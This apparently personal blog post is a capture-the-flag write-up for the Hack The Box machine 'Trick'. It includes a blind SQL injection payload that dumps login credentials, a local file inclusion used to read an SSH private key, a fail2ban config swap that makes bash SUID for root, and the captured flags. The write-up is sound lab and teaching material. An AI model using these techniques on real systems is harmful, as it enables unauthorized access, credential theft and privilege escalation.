[HTB] Trick
2022-08-07 00:41:57 #HTB

Trick

Enum

nmap

Nmap scan report for trick.htb (10.10.11.166)
Host is up (0.39s latency).
Not shown: 65531 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
|   256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
|_  256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp open  domain  ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open  http    nginx 1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
|_http-server-header: nginx/1.14.2
Service Info: Host:  debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1738.39 seconds

DNS Zone Transfer

┌──(kali㉿kali)-[~]
└─$ dig axfr @10.10.11.166 trick.htb

; <<>> DiG 9.17.19-3-Debian <<>> axfr @10.10.11.166 trick.htb
; (1 server found)
;; global options: +cmd
trick.htb.              604800  IN      SOA     trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.              604800  IN      NS      trick.htb.
trick.htb.              604800  IN      A       127.0.0.1
trick.htb.              604800  IN      AAAA    ::1
preprod-payroll.trick.htb. 604800 IN    CNAME   trick.htb.
trick.htb.              604800  IN      SOA     trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 1129 msec
;; SERVER: 10.10.11.166#53(10.10.11.166) (TCP)
;; WHEN: Fri Aug 05 11:36:44 CST 2022
;; XFR size: 6 records (messages 1, bytes 231)

Get subdomain preprod-payroll.trick.htb, add it to /etc/hosts

SQL inject

POST /ajax.php?action=login HTTP/1.1
Host: preprod-payroll.trick.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 35
Origin: http://preprod-payroll.trick.htb
Connection: close
Referer: http://preprod-payroll.trick.htb/login.php
Cookie: PHPSESSID=ui4d95mmq5f3b0pih3bp2gubc7

username=admin&password=admin

username have time-base injection

---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 2818 FROM (SELECT(SLEEP(5)))ymjy) AND 'NgWX'='NgWX&password=admin
---

result

# databases
available databases [2]:
[*] information_schema
[*] payroll_db

# payroll_db's tables
Database: payroll_db
[11 tables]
+---------------------+
| position            |
| allowances          |
| attendance          |
| deductions          |
| department          |
| employee            |
| employee_allowances |
| employee_deductions |
| payroll             |
| payroll_items       |
| users               |
+---------------------+

Database: payroll_db
Table: users
[8 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| address   | text         |
| contact   | text         |
| doctor_id | int(30)      |
| id        | int(30)      |
| name      | varchar(200) |
| password  | varchar(200) |
| type      | tinyint(1)   |
| username  | varchar(100) |
+-----------+--------------+

Database: payroll_db
Table: users
[1 entry]
+----+---------------+------------+-----------------------+
| id | name          | username   | password              |
+----+---------------+------------+-----------------------+
| 1  | Administrator | Enemigosss | SuperGucciRainbowCake |
+----+---------------+------------+-----------------------+

Using Enemigosss:SuperGucciRainbowCake login to site http://preprod-payroll.trick.htb. Nothing found, :(

Fuzzing subdomain again

┌──(kali㉿kali)-[~/htb/Trick]
└─$ ffuf -u http://trick.htb -H 'Host: preprod-FUZZ.trick.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs 5480

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://trick.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: preprod-FUZZ.trick.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response size: 5480
________________________________________________

marketing               [Status: 200, Size: 9660, Words: 3007, Lines: 179]
:: Progress: [4989/4989] :: Job [1/1] :: 91 req/sec :: Duration: [0:00:51] :: Errors: 0 ::

Add preprod-marketing.trick.htb to /etc/hosts

LFI

http://preprod-marketing.trick.htb/index.php?page=hava LFI

Read /home/michael/.ssh/id_rsa to get private key

User

chmod 600 id_rsa
ssh michael@10.10.11.116 -i id_rsa

Get user flag

698bb876ab3abd78fd1e7e54372b2607

priv esc

michael@trick:~$ sudo -l
Matching Defaults entries for michael on trick:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User michael may run the following commands on trick:
    (root) NOPASSWD: /etc/init.d/fail2ban restart

refer the blog: https://github.com/rvizx/fail2ban/blob/main/fail2ban

We should have privilege to change /etc/fail2ban/action.d/iptables-multiport.conf

Although we could’n change this file, bug the michael user is the security group member

, and security group have permision in folder /etc/fail2ban/action.d/

michael@trick:~$ ls -al /etc/fail2ban/ | grep action.d
drwxrwx---   2 root security  4096 Aug  6 18:27 action.d

So, we can replace the file in this folder

Edite the poc like this

[INCLUDES]
before = iptables-common.conf
[Definition]
actionstart = <iptables> -N f2b-<name>
              <iptables> -A f2b-<name> -j <returntype>
              <iptables> -I <chain> -p <protocol> -m multiport --dports <port> -j f2b-<name>
actionstop = <iptables> -D <chain> -p <protocol> -m multiport --dports <port> -j f2b-<name>
             <actionflush>
             <iptables> -X f2b-<name>
actioncheck = <iptables> -n -L <chain> | grep -q 'f2b-<name>[ \t]'
actionban = chmod 4755 /bin/bash
actionunban = <iptables> -D f2b-<name> -s <ip> -j <blocktype>
[Init]
michael@trick:~$ mv iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.conf
mv: replace '/etc/fail2ban/action.d/iptables-multiport.conf', overriding mode 0644 (rw-r--r--)? y
michael@trick:~$ sudo /etc/init.d/fail2ban restart
[ ok ] Restarting fail2ban (via systemctl): fail2ban.service.

After restart the fail2ban service, we should ban ourselves by login fail to ssh a lot of times, later the bash will have suid

michael@trick:~$ bash -p
bash-5.0# id
uid=1001(michael) gid=1001(michael) euid=0(root) groups=1001(michael),1002(security)
bash-5.0# cat /root/root.txt
de1ea7b2f28daef221556dece37f8abe
上一页
2022-08-07 00:41:57 #HTB
下一页